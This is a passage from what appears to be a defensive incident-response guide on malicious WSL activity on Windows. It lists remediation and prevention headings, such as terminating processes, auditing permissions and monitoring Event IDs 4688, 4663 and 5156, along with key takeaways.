Look for recently modified files:
🔧 4. Remediation Steps
📌 1. Terminate Malicious WSL Processes
📌 2. Disable WSL (if unused)
📌 3. Audit User Permissions
Verify only authorized users can run WSL.
📌 4. Block Suspicious IPs
📌 5. Perform Full Antivirus Scan
🛡️ 5. Prevention Steps
Enable Logging for WSL:
Monitor all WSL-related events.
Restrict WSL Installation:
Allow installation only for specific accounts.
Monitor Network Connections:
Identify external communication from WSL.
Regular Auditing:
Check Event IDs 4688, 4663, 5156 frequently.
Limit Execution of Sudo Commands:
Enforce least privilege principles.
🧠 6. Key Takeaways
First-Time WSL Execution: Could indicate suspicious activity.
Focus on Event IDs: 4688, 4663, 5156.
Trace Network Connections: Look for outbound communication.
Monitor Script Execution: Pay attention to WSL launching external scripts.
Last updated